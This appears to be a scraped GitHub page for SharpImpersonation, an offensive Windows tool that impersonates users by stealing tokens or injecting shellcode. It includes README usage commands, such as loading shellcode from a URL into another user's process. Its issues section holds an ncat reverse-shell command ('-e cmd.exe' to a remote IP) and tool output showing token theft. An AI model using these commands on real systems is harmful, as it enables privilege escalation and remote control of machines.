s3cur3th1ssh1t / sharpimpersonation Goto Github PK

A User Impersonation tool - via Token or Shellcode injection

License: BSD 3-Clause "New" or "Revised" License

C# 100.00%

sharpimpersonation's Introduction

SharpImpersonation

This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

https://github.com/0xbadjuju/Tokenvator

A blog post for the intruduction can be found here:

https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

List user processes

PS > PS C:\temp> SharpImpersonation.exe list

List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

sharpimpersonation's People

Contributors

Stargazers

Watchers

Forkers

zhouzu dviros alainw68 dannymas leftp fengjixuchui scriptidiot y0d4a slooppe shantanu561993 gavz wisdark v4nyl goowen taipansec zha0 tai-rex f1r4s cutff c0bber phuong39 lleon1435 superuser5 tehseensagar hackinfinity modulexcite sensi-1337 invokethreatguy bleszily joel-correa sepo79 raspberryhusky bl4d3666 korallin jabdy86 leomatias talibosmani stryker2k2 askyeye usama7628674 gysf666 crimsonlabs-io curtishoughton tomkallo 0xrobert omair2084 killvxk zijiei beerandgin shadowsector7 zero10-coder cvlabsio devilbot000 digitalarche startagain2016 testitok thugthink mygit2014 sec-fork nyameeeain oops4git 30579096 micfacetime empred a1swartz naitsirhc41 ongyuann marcianobarros20 d1ceman kubao5705 lllsondowlll

sharpimpersonation's Issues

The directory name is invalid (PSEXEC)

Hi, when i run program with psexec, i got this error, how can i solve the problem ?

[*] CreateProcessWithLogonW
[-] Function CreateProcessWithLogonW failed:
[-] The directory name is invalid

[-] NtQueryInformationToken failed - error code: 3221225507

This just loops:

[*] Username given, checking processes

[+] NtOpenProcess Success!

[+] NtOpenProcessToken Success!
[-] NtQueryInformationToken failed - error code: 3221225507
[+] NtQueryInformationToken Success!

[+] NtClose Success!

[+] NtOpenProcess Success!

Access denied

[] Changing WINSTA/Desktop permissions for the target user: NT AUTHORITY\SYSTEM
[] Setting Permission for : NT AUTHORITY\SYSTEM

[] Stealing token from ProcID: 2256 to start binary: powershell.exe whoami
[+] Recieved Handle for: (2256)
[+] Process Handle: 0x02D4
[+] Primary Token Handle: 0x02D8
[+] Duplicate Token Handle: 0x02D4
[] Adjusting Token Privilege
SeAuditPrivilege
[+] Recieved luid
[] AdjustTokenPrivilege
[+] Adjusted Privilege: SeAuditPrivilege
[+] Privilege State: SE_PRIVILEGE_ENABLED
[] CreateProcessWithTokenW
Starting C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe with arguments whoami
Directory: C:\Users\Administrator\Desktop
Tried starting process, return value is False
[-] Function CreateProcessWithTokenW failed:
[-] Access denied.

The directory name is invalid

I keep getting this error:
[*] CreateProcessWithLogonW
[-] Function CreateProcessWithLogonW failed:
[-] The directory name is invalid

I tried to find this reference in the codebase but didnt really seem to highlight anything. Thanks for the help!

the below commands give the same result:

SharpImpersonation.exe user:xor\david binary:"C:\Windows\temp\ncat.exe 192.168.119.127 443 -e cmd.exe"
SharpImpersonation.exe user:xor\david binary:"C:\Windows\temp\ncat.exe 192.168.119.127 443 -e cmd.exe"
SharpImpersonation.exe user:xor\david binary:"ncat.exe 192.168.119.127 443 -e cmd.exe"

The inject shellcode command works just fine though:
SharpImpersonation.exe user:xor\david shellcode:

[*] Username given, checking processes

[+] Found process for user xor\david with PID: 2752

[*] Adjusting Token Privilege
SeDebugPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeDebugPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED

 [*] Changing WINSTA/Desktop permissions for the target user: xor\david
 [*] Setting Permission for : xor\david

[*] Stealing token from ProcID: 2752 to start binary: ncat.exe 192.168.119.127 443 -e cmd.exe
[+] Recieved Handle for:  (2752)
 [+] Process Handle: 0x0328
[+] Primary Token Handle: 0x0300
 [+] Duplicate Token Handle: 0x0328
[*] Adjusting Token Privilege
SeAuditPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeAuditPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED
Starting ncat.exe
Starting C:\Windows\temp\ncat.exe
[*] CreateProcessWithLogonW
 [-] Function CreateProcessWithLogonW failed: 
 [-] The directory name is invalid

Dir List:

PS C:\Windows\temp> 
dir
dir


    Directory: C:\Windows\temp


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       12/29/2021   5:56 PM                DiagTrack_alternativeTrace                                            
d-----       12/29/2021   5:56 PM                DiagTrack_aot                                                         
d-----       12/29/2021   5:56 PM                DiagTrack_diag                                                        
d-----       12/29/2021   5:56 PM                DiagTrack_miniTrace                                                   
d-----       12/29/2021  11:40 AM                vmware-SYSTEM                                                         
-a----       12/29/2021  11:13 AM          32768 ConPtyShell.exe                                                       
-a----       12/29/2021   9:00 AM          11264 inject.exe                                                            
-a----       12/29/2021   1:30 PM          44544 InjectProc.exe                                                        
-a----       12/29/2021   1:33 PM          66174 Invoke-ConPtyShell.ps1                                                
-a----       12/28/2021   9:49 PM          18078 MpCmdRun.log                                                          
-a----       12/29/2021   1:51 PM        1667584 ncat.exe                                                              
-a----       12/29/2021   2:21 PM         128512 SharpImpersonation.exe                                                
-a----       12/29/2021   6:11 PM            102 silconfig.log                                                         
-a----       12/29/2021  11:22 AM         453632 TokenPlayer.exe                                                       
-a----       12/29/2021   5:55 PM          68323 vmware-vmsvc.log                                                      
-a----       12/29/2021   6:11 PM            414 vmware-vmusr.log                                                      
-a----       12/29/2021   5:56 PM            288 vmware-vmvss.log                                                      


PS C:\Windows\temp>